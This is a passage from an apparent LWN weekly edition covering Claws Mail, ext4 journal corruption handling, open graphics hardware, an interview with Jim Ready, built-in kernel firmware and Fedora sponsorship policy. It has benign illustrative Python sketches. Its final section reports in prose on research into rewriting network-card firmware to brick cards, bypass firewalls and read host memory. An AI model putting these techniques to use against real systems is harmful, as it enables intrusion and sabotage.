before lists like linux-kernel are factored in - so there is a real need
for a mail client which can process messages without adding even a few
seconds of overhead.  At that time, none of the clients reviewed were up to
the task; it seems that developers of graphical clients value a number of
features above speed and flexibility.


That review mentioned a client called sylpheed-claws; at that time, this
client was being managed as a sort of development branch for sylpheed, with
every intent of getting changes back into that system.  Since then,
sylpheed-claws has evolved into a full fork intended to create an
independent application; its new name is Claws Mail.  In 2004, your editor had
found sylpheed-claws to be an unstable platform at best; in 2008, it seemed
like time to go back and see what the developers had accomplished in the
last four years.  To that end, Claws Mail 3.4.0 was installed and put
through its paces.

The good news is that this client has, indeed, stabilized over time.  Your
editor was unable to make it crash - always a nice feature in a mail
client.  Many of the features which were under development four years ago
are now stable and supported - and, generally, well documented.  Claws Mail
has come a long way.

 
The Claws Mail developers emphasize configurability, so there's a wide
variety of options to wander through.  The layout of the window is highly
configurable, allowing the user to make the best use of the available
screen space.  Most aspects of the client's behavior can be tweaked.  For
somebody who is willing to wander through a long series of configuration
screens, Claws Mail offers the ability to adapt the client to just about
any set of needs.


Dealing with email is a keyboard-intensive activity.  One of your editor's
biggest complaints with graphical clients has been the need to switch
constantly between the keyboard and the mouse - a transition which breaks
focus and steals
time.  Claws Mail has improved things in this regard, in that a wide
variety of actions can be handled without the mouse.  And, unlike some
other graphical clients, changing the keyboard bindings is easily done.


For some simple operations - plowing through a mail folder, reading and
deleting messages - Claws Mail can be visibly slow.  Working over IMAP does
not help, of course, but it is slower than with, for example, Thunderbird.
In addition, by default, Claws Mail will not display a message which
becomes selected as the result of, say, deleting the message before it.  So
the cycle of deleting a message and viewing the next one requires two
keystrokes or clicks.  That particular problem can be configured away, of
course.  Much of the remaining slowness can be mitigated by turning off the
"execute moves and deletes immediately" option - a change which also makes
it easier to recover from overzealous "delete finger" reflexes.


One common bit of workflow for your editor involves feeding a message to an
external program.  As a general rule, graphical mail clients do not make
this possible, though this feature is almost universal in non-graphical
clients.  Claws Mail includes the concept of "actions," which are,
essentially, external programs which act on messages.  This feature
almost solves the problem; actions can be set up with quite a bit of
flexibility, and they can be bound to keystrokes.  But there is no
equivalent to the "|" operation provided by textual clients, meaning that
it's not possible to pipe a message into an arbitrary command.  Claws
Mail only passes through the mail headers which are visible on the screen -
and there appears to be no way to configure that behavior.
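
For comparison, the "|" operation in a textual client amounts to handing the complete raw message, hidden headers included, to a command's standard input.  The Python sketch below shows that behavior in isolation; it has nothing to do with the Claws Mail plugin API, and the message, addresses, and helper name are invented for the example.

```python
import subprocess
import sys

def pipe_message(raw_message, command):
    """Feed a complete message (all headers plus body) to command on stdin."""
    result = subprocess.run(command, input=raw_message,
                            capture_output=True, check=True)
    return result.stdout

# Hypothetical message, including a header a client might not display.
message = (b"From: editor@example.com\n"
           b"X-Hidden-Header: not shown on screen\n"
           b"Subject: test\n"
           b"\n"
           b"Body text\n")

# Stand-in for an arbitrary external program: report how many bytes arrived.
counter = [sys.executable, "-c",
           "import sys; sys.stdout.write(str(len(sys.stdin.buffer.read())))"]

print(pipe_message(message, counter))
```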


HTML mail appears to be an unfortunate fact of life on the contemporary
net.  Claws Mail will render such mail as text by default; there are also a
couple of plugins which can render HTML mail as intended by its sender.  It
warmed your editor's heart to note that Claws Mail (unlike certain other
clients) does not send HTML mail by default.  In fact, it lacks the ability
to send HTML mail at all.  These developers seem to have their priorities
in the right place.


Offline operation is another nice feature in a mail client.  Claws Mail has
such a feature, but your editor was only able to get it partially working.
The client can gather up mail for offline reading, but changes and sending
of mail lead to a series of "I can't do this" dialogs.  Some more
configuration (e.g. setting up a local drafts folder) helps in this regard,
but this area looks a bit like a work in progress.


There's no end of other features, of course.  Claws Mail supports encrypted
mail, spelling checking, filtering of messages on arrival (with an
optional Perl plugin for those especially complicated filtering jobs), a
mail template facility, color-labeling of mail, tagging, scoring, watching
of threads, and more.  There are plugins which will turn on a laptop LED
when mail arrives, strip attachments, view PDF files, track RSS feeds, deal
with vCalendar messages, etc.  There is a complex search mechanism which
can do a lot more than just string matches.  It is, in summary, a highly
capable tool with more features than just about anybody is likely to use.


So has your editor made the change?  Not yet.  Ways around some of the speed
issues will have to be found, and it may be necessary to write a plugin to
make Claws Mail work with some LWN processes.  A few other details need to
be made to work correctly.  But it can be said that Claws Mail has gotten
closer than any other graphical mail client that your editor has tried to
date.

		Responding to ext4 journal corruption


Last week's article on
barriers described one way in which things could go wrong with journaling
filesystems.  Therein, it was noted that the journal checksum feature added
to the ext4 filesystem would mitigate some of those problems by preventing
the replay of the journal if it had not been completely written before a
crash.  As a discussion this week shows, though, the situation is not quite
that simple.


Ted Ts'o was doing some ext4 testing when he noticed a problem with how the journal
checksum is handled.  The journal will normally contain several
transactions which have not yet been fully played into the filesystem.
Each one of those transactions includes a commit record which contains,
among other things, a checksum for the transaction.  If the checksum
matches the actual transaction data in the journal, the system knows that
the transaction was written completely and without errors; it should thus
be safe to replay the transaction into the filesystem.


The problem that Ted noticed was this: if a transaction in the middle of
the series failed to match its checksum, the playback of the journal would
stop - but only after writing the corrupted transaction into the
filesystem.  This is a sort of worst-of-all-worlds scenario: the kernel
will dump data which is known to be corrupt into the filesystem, then
silently throw away the (presumably good) transactions after the bad one.  The
ext4 developers quickly arrived at a consensus that this behavior is a bug
which should be fixed.
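
The difference between the behavior Ted observed and a replay which
verifies each transaction before writing it can be shown with a small
Python model.  This is only a sketch, not jbd2 code: the function names
and the dictionary layout are invented for illustration, and CRC32 simply
stands in for the journal's checksum.

```python
import zlib

def make_transaction(blocks):
    """Build a toy transaction: blocks plus a commit record holding a CRC32."""
    return {"blocks": list(blocks),
            "commit_checksum": zlib.crc32(b"".join(blocks))}

def checksum_ok(txn):
    """Recompute the checksum over the blocks and compare with the commit record."""
    return zlib.crc32(b"".join(txn["blocks"])) == txn["commit_checksum"]

def replay_buggy(journal):
    """Model of the reported bug: the bad transaction is written, then replay stops."""
    written = []
    for txn in journal:
        written.extend(txn["blocks"])
        if not checksum_ok(txn):
            break
    return written

def replay_checked(journal):
    """Verify first, and stop before writing anything from a bad transaction."""
    written = []
    for txn in journal:
        if not checksum_ok(txn):
            break
        written.extend(txn["blocks"])
    return written

journal = [make_transaction([b"A1", b"A2"]),
           make_transaction([b"B1", b"B2"]),
           make_transaction([b"C1"])]
journal[1]["blocks"][0] = b"??"   # simulate corruption in the middle transaction

print(replay_buggy(journal))      # corrupt block reaches the "filesystem"
print(replay_checked(journal))    # only the first transaction is replayed
```

In both variants the third (good) transaction is never replayed.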


But what should really be done is not as clear as one might think.  Ted's
suggestion was this:


	So I think the right thing to do is to replay the *entire* journal,
	including the commits with the failed checksums (except in the case
	where journal_async_commit is enabled and the last commit has a bad
	checksum, in which case we skip the last transaction).  By
	replaying the entire journal, we don't lose any of the revoke
	blocks, which is critical in making sure we don't overwrite any
	data blocks, and replaying subsequent metadata blocks will probably
	leave us in a much better position for e2fsck to be able to recover
	the filesystem.


A bit of background might help in understanding the problem that Ted is
trying to solve here.  In the default data=ordered mode, ext3 and
ext4 do not write all data to the journal before it goes to the filesystem
itself.  Instead, only filesystem metadata goes to the journal; data
blocks are written directly to the filesystem.  The "ordered" part means
that all of the data blocks will be written before the filesystem code will
start writing the metadata; in this way, the metadata will always describe
a complete and correct filesystem.

Now imagine a journal which contains a set of transactions similar to these
(in this order):


 1. A file is created, with its associated metadata.

 2. That file is then deleted, and its metadata blocks are released.

 3. Some other file is extended, with the newly-freed metadata blocks
     being reused as data blocks.


Imagine further that the system crashes with those transactions in the journal,
but transaction 2 is corrupt.  Simply skipping the bad transaction and
replaying transaction 3 would lead to the filesystem being most
confused about the status of the reused blocks.  But just stopping at the
corrupt transaction also has a problem: the data blocks created in
transaction 3 may have already been written, but, as of
transaction 1, the filesystem thinks those are metadata blocks.  That,
too, leads to a corrupt filesystem.  By replaying the entire journal, Ted
hopes to catch situations like that and leave the filesystem in an overall
better shape.

It is, perhaps, not surprising that there was some disagreement with this
approach.  Andreas Dilger argued:


	The whole point of this patch was to avoid the case where random
	garbage had been written into the journal and then splattering it
	all over the filesystem.  Considering that the journal has the
	highest density of important metadata in the filesystem, it is
	virtually impossible to get more serious corruption than in the
	journal.


The next proposal was to make a change to
the on-disk journal format ("one more time") turning the per-transaction
checksum into a per-block checksum.  Then it would be possible to get a
handle on just how bad any corruption is, and even corrupt transactions
could be mostly replayed.  As of this writing, that looks like the approach
which will be taken.
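
The idea of a per-block checksum can be sketched in a few lines of
Python.  This is a toy model under stated assumptions, not the proposed
on-disk format: the helper names are hypothetical, and CRC32 is used only
because it is readily available.

```python
import zlib

def commit(blocks):
    """Record one CRC32 per block, rather than one for the whole transaction."""
    return {"blocks": list(blocks),
            "checksums": [zlib.crc32(b) for b in blocks]}

def corrupt_blocks(txn):
    """Return the indexes of blocks that no longer match their checksum."""
    return [i for i, (block, crc) in enumerate(zip(txn["blocks"], txn["checksums"]))
            if zlib.crc32(block) != crc]

def replay_mostly(txn):
    """Replay every block that verifies; report the ones that were skipped."""
    bad = set(corrupt_blocks(txn))
    good = [b for i, b in enumerate(txn["blocks"]) if i not in bad]
    return good, sorted(bad)

txn = commit([b"inode table", b"block bitmap", b"directory"])
txn["blocks"][1] = b"block bitmaX"      # damage a single block
good, bad = replay_mostly(txn)
print(good, bad)
```

With one checksum per transaction, the same damage would only say that
something in the transaction is wrong; here the recovery code can see
that exactly one block of three is bad.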


Arguably, the real conclusion to take from this discussion was best expressed by Arjan van de Ven in
an entirely different context: "having a journal is soooo
1999".  The Btrfs filesystem, which has a good chance of replacing
ext3 and ext4 a few years from now, does not have a journal; instead, it
uses its fast snapshot mechanism to keep transactions consistent.  Btrfs
may, thus, avoid some of the problems that come with journaling - though,
perhaps, at the cost of introducing a set of interesting new problems.

		The Open Graphics Project prepares to release hardware


The Open Graphics Project is working to produce an open-hardware
PCI graphics card with open-source drivers. The
Wikipedia entry
for OGP is a good source for information on the project.
The OGP project vision is detailed in the
About document:


There is a market for graphics hardware with good support for free software and free operating systems (there may or may not be a market for open graphics hardware also, but that is beyond the scope of this project). Such a graphics card would benefit from lower software development cost and mindshare in order to be commercially viable. Free software could benefit from the active cooperation of the manufacturer of such a card to create better drivers and to get a card that better meets the requirements of free software.
Currently, the market for such cards is not served very well. NVIDIA has no offering in this market, ATI's older cards have very limited support, while their new ones have none, and Matrox has no offering in this market either. XGI are off to a good start but still no 3D code yet.
In order to get manufacturers to make such hardware, we have to show that it will be economically viable to do so.


OGP is working with the company
Traversal Technology
to develop the hardware side of the project, known as the OGD1.
OGP recently announced that it is now taking
pre-orders
for the OGD1 board.  The card will initially cost $1500; there will
be a $100 discount for the first 100 orders.
Larger quantity orders will receive a significant discount.


The initial price may seem rather high for a video card when similar
mass-produced products can be had for several hundred dollars.
This can partly be justified by the fact that the OGD1 is more of
a development platform than a commodity video card.
The OGD1 is also useful for embedded and stand-alone video products,
where commodity parts are not available and custom designs are expensive.
Additionally, part of the money raised by selling OGD1 cards will go
toward funding OGP.
The OGD1 FAQ
addresses the price issue:
"OGD1 is actually very competitively priced compared to FPGA kits with similar capabilities and capacity. For very small FPGA projects, OGD1 may be over-kill. But for larger projects, OGD1 is a must and a bargain."


The OGD1 rev B hardware specs explain the board's features and show
a photo of the board.
The basic capabilities include a maximum resolution of 2560x1600 pixels,
256MB of 200MHz video memory, DVI, RGB, S-Video and composite video
outputs, a PCI/PCI-X interface and user-specified I/O.


A number of commercial video card manufacturers have been
warming up to the concept of open-source drivers.
For several years, Intel's policy has been to provide free drivers for
all of their video products.
ATI has released documentation for their Graphics Processing Unit (GPU)
and AMD is also supporting open-source drivers.
The LWN
2007 kernel summit
coverage notes:
"Starting with the R500 chipset and going forward, AMD will fully support free drivers for all of its graphics processors. This support will not take the form of a release of the current proprietary ATI driver; that code is not considered to be something that anybody would really want to look at. So there will be a clean start. AMD will release specifications and a skeleton driver with the plan to have 2D support working by the end of the year. The company is clearly hoping that the community will do much of the work on the driver, but it also plans to participate actively in the process."


While the OGD1 is somewhat in competition with commercial video card
manufacturers, the developers are encouraging the release of more
open-source drivers and specification information.  According to the
OGD1 FAQ:
"We applaud ATI for doing the right thing and making available their GPU documentation for use by Free Software developers. There are certain market segments where ATI's offering may affect us, but there are other market segments (e.g. embedded systems, single-board computers, servers, special-purpose, etc.) where our growth potential is entirely unaffected. Moreover, they in no way impact our broader goals of enabling hardware hacking and bringing open hardware to the people."


If you are a developer who wants to get involved in the development
of video card firmware, or you need a well-supported video architecture
for an embedded project, the OGD1 could prove to be an effective
solution.


		An interview with Jim Ready


Jim Ready has a long history in the embedded systems market.  Most
recently, he founded MontaVista, now one of the most
successful embedded Linux companies.  A recent LWN article took issue
with some of Jim's comments; it only seemed fair to give him the
opportunity to present his side of the story.  Thus, this interview.  We
asked several questions about MontaVista and its approach to Linux
marketing, and Jim took quite a bit of time to answer them in detail.  So,
without further ado...


You have been working in the embedded Linux market for some years.  How has
that market changed over that time?  What do you think are the prospects
for embedded Linux now?


The single biggest change, and one that gives me great pleasure, is that
embedded Linux is now mainstream, part of the landscape, and arguably the
fastest growing embedded OS. Believe me, when we started in 1999 that was
hardly the case. Of course, the complexity of the devices that our
customers are building continues to increase. The underlying hardware is
typically a highly integrated system with loads of I/O, for example the
SOCs (System On a Chip) such as the TI 3430. That in turn drives both
complexity in Linux as well as in the application and middleware software
stacks. It's pretty amazing to realize that a little Linux-based
handheld device running on batteries is powerful enough to have supplied
the State of California government's computing needs not so many years
ago.


Where do you think MontaVista's sweet spot is in that market?


Companies who are highly focused on their value-add who want a first class
partner to supply them a suitable Linux and associated services (consulting
and training etc.) upon which they will develop their application. The more
formal approach a company takes towards their own software development, the
more they care about meeting schedules and the higher their requirements
for quality, the "sweeter" MontaVista looks. When you're basing a
billion dollar product line on someone's OS you care about what's
going in your product. So when Motorola, NEC or Panasonic end up shipping
30 million phones, they need a supplier who can meet their technical,
schedule and quality requirements. The phones have to ship for the
Christmas season, and no one wants to recall millions of devices. 

As
another example, our Carrier Grade Linux distribution is the core OS in
deployed NEC systems which have established 99.9999% availability
(that's no more than ~31.5 seconds of unscheduled downtime in a year,
which is a DoCoMo requirement). Our Professional Edition is the OS for two
different patient monitoring systems that have been through FDA
certification. We're truly fortunate to have thousands of customers,
both big and not-so-big.


Embedded systems vendors have, as a group, been criticized for their lack
of participation in the free software development process.  Are you happy
with MontaVista's level of contribution?  What, in your mind, are some of
the highlights of MontaVista's community participation?


Most contribution surveys show MV in the top 10 of Linux contributors. (No
other embedded Linux vendor even makes it into the top 30) Arguably
MontaVista contributes more to Linux relative to our size than any other
company in the world. It has always been a cornerstone of our strategy to
be a major contributor to Linux. We figured the more gas we poured on the
Linux fire the faster we could erode the RTOS suppliers' installed base and
speed the movement towards Linux. We are perhaps best known for our work in
helping make Linux real-time capable but over time we have also made
significant contributions in the PPC, XScale, MIPS and ARM trees as well as
some other specific projects such as kgdb, LTT, DPM (Dynamic Power
Management) etc.


Your recent article
in Military Embedded Systems was seized upon by a 
proprietary embedded vendor as proof that Linux is too expensive and
difficult for embedded applications.  Assuming you disagree with his
conclusions, where do you think his reasoning went wrong?


Well there really wasn't any reasoning, just ranting. But having said
that, Dan (Dan O'Dowd, Green Hills' CEO) implied that our business model
was to allow customers to more or less get in trouble by developing their
own from-scratch Linux distribution and then charge them for support to
bail them out. Of course that's not what we do. Rather we build a robust
fully tested and supported embedded Linux distribution (MontaVista Linux
Professional Edition, for example) and deliver that to our customers. We
then maintain and support that specific version of MontaVista Linux over
time, even as the community dashes forward. In fact we have maintenance
obligations that can be as long as a decade from initial deployment. 

That
approach gets the customer out of the business of making their own
distribution, maintaining and supporting it with all the accompanying
costs. So we shield the customer from the complexity and change rate that
they otherwise would be exposed to if they were on their own. They don't
have to watch all the patches, monitor the newsgroups and otherwise be tied
up, they can get on to building their product. Dan purposely ignored the
fact that a commercial embedded Linux distribution makes it very easy to
use Linux as an embedded OS. I suspect that's why he tried to hide it.


Your article suggests that an embedded systems manufacturer using Linux
would start by assembling the kernel and development toolchain by hand.
Why do you think they would do that?  Even in the absence of vendors like
MontaVista, there are numerous options which do not require assembling
systems at such a low level; why would a vendor not use one of them?


We know from direct experience that even starting with what appears to be a
"pre-assembled" distribution, from a semiconductor maker or
elsewhere, a developer sometimes isn't getting what they think they
are. 


Don't get me wrong, almost any Linux distribution can serve as a
starting point, maybe 99.99% perfect, but our customers demand more than
that. They want to be at the end of the Linux development cycle, not the
beginning. For example, a Linux distribution we recently started working
with had the following problems:


 The code explicitly ignored Linux coding standards by adding hardware
dependencies.  That code would never be accepted into the upstream trees,
and this kind of fork creates debugging issues and additional maintenance
burden.


 The drivers were not SMP-safe, real-time safe nor did they support DPM, yet
the device was designed for applications where all three could well be
required.  In order to take advantage of these advanced features, the
device driver would need to be re-written from scratch.


 The code contained numerous defects that caused the system to crash. Error
returns were not checked and other problems indicating very poor coding
practices.  These are exactly the type of quality issues that should compel
businesses to find a Linux commercialization partner.


We had the great pleasure of fixing all these problems as we assembled our
distribution. Even with our standard practice of pushing back the changes,
as you well know, there is no guarantee by the community that these changes
make it back into the appropriate open source trees. 


The fact is it is difficult for a prospective Linux developer to have any
idea of the state of the Linux distribution they might select. A high
quality, commercial distribution can give a developer some peace of mind
about what they are getting. For example, MontaVista has a formal
development process in place for each of its releases, with quantitative
criteria that must be met for defects (0 critical defects for example with a
sharply declining overall new defect detection curve.) before the
distribution can ship. Our processes have been formally audited by a number
of our largest customers in order to assure themselves of what they are
getting from us. And as we mentioned above, the proven results from devices
in the field speak to our abilities. As for other starting points,
you'll have to ask them about their process.


There were some interesting numbers in that article.  Where did the
5000 messages/day for kernel.org come from - which lists?  


Since our engineers live and breathe Linux and the other Open Source
components that make up an embedded Linux distribution, we have a pretty
good feel for the overall rate of traffic we keep up with. Based upon that
experience we measured the overall message traffic that a developer would
have to monitor to keep abreast of the daily ins and outs of the typical
mix of software they would use for an embedded Linux project. We aggregated
the total under kernel.org, which isn't precisely correct, but the
paragraph preceding that statement clearly referred to a set of lists one
would have to monitor. 

For example,  the monitoring would include not only
lkml, but also the lists for other significant parts of the software
typically used for an embedded project, including the list maintained for
the specific architecture used (MIPS, PPC, ARM etc.), the real-time list,
networking, IPv6, security, advanced filesystems etc. By the way, the lkml
list on May 21, 2008 contained ~500 messages, and gcc contained ~100, just
for starters. So it wasn't just lkml at 5000 but a total set that can
total up to 5000 per day. Does the fact that lkml is only ~500 a day (and
"only" ~200-300 on weekends) make it any less daunting? I don't
think so.


You say: "a recent security patch that took all of 13 lines of code to
implement against an embedded Linux system would have taken more than 800k
lines of source patches to implement if the previous trail of patches had
been ignored."  How was that number arrived at?  Which security patch were
you describing?  How could it possibly require 800,000 lines of patches "to
implement" this security fix?


This example comes from a sequence back in 2006 (CVE-2006-1528 to be
precise), but the "problem" is just as true today. Here's the
setup:


A developer decides to use Linux and has taken the strategy of minimizing
their costs by using a community-maintained Linux kernel. (This story would
be true if the developer started with the typical semiconductor
distribution, by the way) The community has a good reputation for stability
and defect resolution and therefore the developers think they can minimize
their own effort. 

They start with Linux 2.6.10 and base their device
application software on this release. During testing, they notice a defect
and find that the defect has been identified (the good news) and fixed in
2.6.13 (the bad news). So now they have a problem: moving up to 2.6.13,
where the defect is fixed, also introduces 846,233 new lines of code (the
delta between 2.6.10 and 2.6.13).

This magnitude of change restarts their
QA process, since so much code has changed in the underlying Linux
kernel. Their other choice is to backport the fix, which in this particular
case is 33 lines (we know because we did it), but now the developer has
taken on maintenance of their own Linux, which was what they were trying to
avoid in the first place. This drift between a Linux release you have
baselined and the fact that defects are often fixed in newer releases
presents a less than perfect set of choices for developers. Whether you
wanted to or not, you're in the Linux maintenance business. This drift
problem is true of many distributions, not just dealing with kernel.org.


If our customer found the same defect, we have the obligation to fix it in
the release that they purchased from us; we don't force them to
potentially destabilize their environment by sending them a newer kernel
release where the defect was originally fixed. I guess it all depends how
cavalier one is about changing your underlying operating system after
you've developed and tested your application. In general our customers
are very strict about minimizing changes, and so are we.


At least some of MontaVista's marketing would appear to focus on making
Linux look scary.  Are you not concerned that this approach might have the
effect of making Linux in general look less attractive and, thus, playing
into the hands of proprietary systems vendors?


No one is a bigger proponent of embedded Linux than MontaVista (and we have
the contributions to prove it). But it doesn't do us any good to have
folks try Linux, get over their heads and fail, and attribute that failure
to Linux. 


We have seen over the past 8 years any number of projects that got into
trouble by not understanding what to expect when they downloaded some Linux
and started in by themselves. In fact one of our very earliest customers,
back in 1999, had started off building their own Linux, and hit a hardware
integration bug that stopped them dead in their tracks for weeks, putting
their project in real trouble. Had we not been able to help them out, their
alternative was Windows CE. Ugh!


Why shouldn't many millions of lines of complex operating system code
that changes daily be a little scary, especially when your business is
making devices, not operating systems? I think it is a mistake to
"trivialize" the difficulty in owning large amounts of any software,
including Linux. That's why I think it's important for folks to be
well informed about what they are getting into, so they can make good
decisions on how they will approach using Linux for their system, whether
they do-it-themselves or go commercial. In either case we want them to
succeed.


Is there anything else you would like to pass on to LWN's readers?


We can all be quite proud of the enormous progress Linux has made in
transforming the embedded OS marketplace from one which was highly
fragmented and largely devoid of standards, to an environment based upon a
highly functional OS which is a truly open standard: Linux. A whole cast of
characters made this possible: visionary customers who dared think it was
possible to embed Linux in their devices, the semiconductor companies
making sure Linux was ported to their chips, commercial companies such as
MontaVista and others making rock solid distributions that were capable of
being deployed by the millions, and numerous individuals who made
significant contributions along the way. It's a pretty powerful
combination that's hard to beat.


We would like to thank Jim for taking the time to answer our questions.

		Using the firmware loader for static data


Some device drivers need firmware to load into the hardware at
initialization time.  The kernel firmware loader interface exists to
support that functionality, but it requires help from user space
which may not be available in all environments.  David Woodhouse has
proposed a patch that would
eliminate that requirement so that more drivers can use the firmware
loader rather than craft their own solution.

 Embedded devices will be one of the main users of this ability.  Many
of those do not have a user space filesystem available at boot
time—via initrd or initramfs—but they still need to access
firmware images to download to peripherals.  The new
request_firmware() implementation would allow those devices to
link the firmware into the kernel while still using the kernel firmware
infrastructure.  


Woodhouse has an excellent summary of what he is trying to do in the patch
posting:

Some drivers have their own hacks to bypass the kernel's firmware loader
and build their firmware into the kernel; this renders those unnecessary.

Other drivers don't use the firmware loader at all, because they always
want the firmware to be available. This allows them to start using the
firmware loader.

A third set of drivers already use the firmware loader, but can't be
used without help from userspace, which sometimes requires an initrd.
This allows them to work in a static kernel.


A driver that has static firmware data declares it using:

The firmware_name is used as a key to find the specific firmware
when request_firmware() is called.  blob is a pointer to
the actual code.  The declaration adds the firmware to the end of an array
holding struct builtin_fw elements, which look like this:


When a call is made to request_firmware(), the new code linearly
searches the array for a matching key before calling out to user space.
This allows any statically created firmware blobs to take precedence over
those in the filesystem.  Whichever is found is returned.
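
The lookup order described above can be modeled in user space with a
short Python sketch.  It is not the kernel implementation: BuiltinFw,
declare_builtin_firmware() and the load_from_userspace callback are
hypothetical names chosen for this example, and only the "built-in array
first, user space second" ordering is taken from the description.

```python
from typing import NamedTuple

class BuiltinFw(NamedTuple):
    name: str     # key matched against the requested firmware name
    data: bytes   # blob linked into the (pretend) kernel image

# Stand-in for the array that each built-in declaration appends to.
BUILTIN_FIRMWARE = []

def declare_builtin_firmware(name, blob):
    """Add a blob to the end of the built-in firmware array."""
    BUILTIN_FIRMWARE.append(BuiltinFw(name, blob))

def request_firmware(name, load_from_userspace):
    """Search the built-in array linearly, then fall back to user space."""
    for fw in BUILTIN_FIRMWARE:
        if fw.name == name:
            return fw.data
    return load_from_userspace(name)

declare_builtin_firmware("nic.fw", b"\x01\x02")

# A dictionary plays the part of the firmware files in the filesystem.
on_disk = {"nic.fw": b"\xff", "sound.fw": b"\x10"}

print(request_firmware("nic.fw", on_disk.get))     # built-in copy wins
print(request_firmware("sound.fw", on_disk.get))   # found only "on disk"
```

A linear search is a reasonable choice here on the assumption that the
number of built-in blobs is small.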


There seemed to be strong agreement that Woodhouse's approach was the right
way to go.  His original implementation copied
the firmware blob before returning it to a request_firmware()
caller, which required a vmalloc() and wasted precious memory
on embedded devices.
Woodhouse was concerned that some drivers might modify the firmware before
loading it into the device.  Once he started looking, he found examples of
that, but instead of penalizing all devices, he changed the firmware data
returned in a struct firmware to be constant, resulting in the
following structure:


This constitutes an API change for anyone using the
request_firmware() interface.  In-tree drivers have been modified
by Woodhouse appropriately, but out-of-tree drivers need to be aware of the
change. Any driver that needs to modify the data
must make a copy for itself.
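
The copy-before-modify rule can be illustrated with Python's immutable
bytes type standing in for constant firmware data.  This is an analogy
only, not driver code; the patch_mac_address() helper and the idea of
patching a MAC address into the image are assumptions made up for the
example.

```python
def patch_mac_address(fw_data, offset, mac):
    """Return a modified private copy; the shared image is left untouched."""
    private = bytearray(fw_data)              # explicit copy owned by the driver
    private[offset:offset + len(mac)] = mac
    return private

shared = bytes(16)    # immutable, standing in for the constant firmware data
patched = patch_mac_address(shared, 4, b"\x00\x11\x22\x33\x44\x55")

try:
    shared[0] = 1     # writing to the shared image is refused
except TypeError:
    print("shared firmware image is read-only")
```

Only a driver that actually needs to change the image pays for the
extra memory.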


Another feature that would be useful for memory-constrained devices is
compression of the firmware in the kernel image.  This is on Woodhouse's radar, but is not seen as a feature that must be
in the first release.  Not copying the data for most drivers is
a bigger win, but compression, especially for large firmware images, might
help.  In those cases, though, both the compressed and uncompressed data
will be in memory while the driver is downloading it.
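
The memory tradeoff can be seen with a small Python sketch.  It uses
zlib purely as a stand-in for whatever compressor the kernel might
adopt, and the "firmware" is invented, highly repetitive test data, so
the ratio it shows says nothing about real images.

```python
import zlib

firmware = bytes(range(256)) * 64          # 16KB of repetitive toy "firmware"
stored = zlib.compress(firmware, 9)        # what would sit in the kernel image

# While the driver downloads the image to the device, both copies exist.
unpacked = zlib.decompress(stored)
peak = len(stored) + len(unpacked)

print("uncompressed:", len(firmware))
print("stored in image:", len(stored))
print("peak while loading:", peak)
```

The saving applies to the image at rest; during the download the peak
is larger than the uncompressed blob alone.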


Getting this work included into 2.6.26 has been discussed, even though the
merge window has closed.  Woodhouse thinks
it might be possible:

Well, it's supposedly too late, but it's dead simple and shouldn't have
much chance of breaking anything, so I suppose as long as we don't
include the korg1212 patch and the rest of the similar patches which
we're still working on, that's not such an insane request.


This is a fairly simple patch that adds some very useful functionality,
especially for the embedded community.  Woodhouse has recently stepped up as one of the kernel
embedded maintainers, so we may see more things like this from him in
the future.  It is unlikely that Linus Torvalds will merge this
feature so late in the 2.6.26 cycle, but inclusion into 2.6.27 seems quite probable.


		Fedora's Packager Sponsors Responsibility Policy


A Linux distribution is really the sum of its packages.  The more packages
that are available, the more useful it becomes for a wide range of needs.
Case in point: Debian has some 20,000-plus packages
available to its users, and to the wide variety of Debian-based
distributions.

Fedora doesn't have quite as many
packages available (yet), but the project hasn't been working at it for
nearly as long either.  Of course having thousands of packages available is
no good if they won't interact well with each other.  A distribution isn't
just a collection of random binary packages.  Packaging guidelines are
critical for ensuring that any package you (the user) install works well
with the rest of your system.

Fedora is working toward having an ever growing number of volunteers
maintaining an ever growing number of packages, and still having an
integrated distribution that works whether you want the "Everything Spin"
or one of the highly specialized Spins, or something in between.

One part of making that happen is having sponsors for new volunteers, and
coming up with a policy to guide these sponsors.  A draft version of the Packager Sponsors
Responsibility Policy was posted to Fedora-devel late last week.  The wiki version contains some additions and clarifications.

With the new policy, sponsors are maintainers who have a good record of
package maintenance and have shown a willingness to review packages and assist
others.  Sponsors act as mentors for new contributors, as package reviewers
and ultimately they are responsible for making sure that bugs are fixed in
their sponsored packages.

The policy also indicates some conditions where a sponsorship might be
revoked:

  A maintainer that no longer wishes to contribute to Fedora, a maintainer
  that refuses to follow guidelines, or irreconcilable differences between
  the maintainer and the Sponsor. In this event it is the responsibility of
  the Sponsor to orphan the maintainers packages, and do any other needed
  cleanups.


Like all such policies, it will evolve over time, but all in all it is a
good start to a policy that should help new maintainers get involved with
the Fedora project.

		Attacking network cards


When considering the vulnerabilities of a system, the hardware is usually
ignored.  Software certainly presents the biggest target—fairly easily
exploited as we have seen—but a new class of attacks goes directly at
the hardware, specifically network cards.  The results can range from a
permanent denial-of-service to a complete compromise of the card's
function.


One researcher has overly cutely dubbed this kind of attack "phlashing"
because it attacks the firmware on the card, which is typically stored in
flash.  The basic idea is that an attacker will rewrite the firmware using
an image under their control.  That image could do any number of fairly
nasty things to the card.


Two separate researchers have recently reported on their explorations into this
type of attack.  Arrigo Triulzi's posting to the, evidently private, Robust
Open Source mailing list was reported
on Ben Laurie's weblog.  Rich Smith of HP also gave a talk on
his PhlashDance fuzzing tool at the EuSecWest conference.  In both
cases, network devices were compromised via insecure remote firmware update
capabilities. 


Smith's research focuses on causing permanent denial-of-service through
overwriting the firmware, presumably with garbage.  At that point, the card
will no longer function and may, in fact, no longer be able to be
updated—remotely or locally—which turns it into a paperweight.
More importantly, no network traffic can use the device, so if it is
situated in a critical router, for example, it could affect a large number
of systems.


A more insidious attack is described by Triulzi.  He replaces the firmware
with new code, effectively reprogramming the device to do whatever he
wants.  One of the attacks goes like this:

[...] I've reached my goal of writing a totally transparent firewall bypass
engine for those firewalls which are PC-based: you simply overwrite the
firmware in both NICs and then perform PCI-to-PCI transfers between the two
cards for suitably formatted IP packets (modern NICs have IP "offload
engines" in hardware and therefore can trigger on incoming and outgoing
packets). The resulting "Jedi Packet Trick" (sorry, couldn't resist) fools,
amongst others, CheckPoint FW-1, Linux-based Strongwall, etc. This is of
course obvious as none of them check PCI-to-PCI transfers.


An additional trick, noted by Laurie and others, is to use those same
techniques to read or write the main memory of the host computer.  This
could certainly allow sensitive information to leak, or the host itself to
be compromised.  As Laurie says: "You might even be able to read
disk, too, depending on the disk controller."


This is truly frightening stuff that is flying under the radar of most
network administrators.  There are no known attacks in the wild, but it
would seem only a matter of time before that happens.  This is definitely
something to keep an eye on.


Other than avoiding vulnerable network hardware—lists of which do not
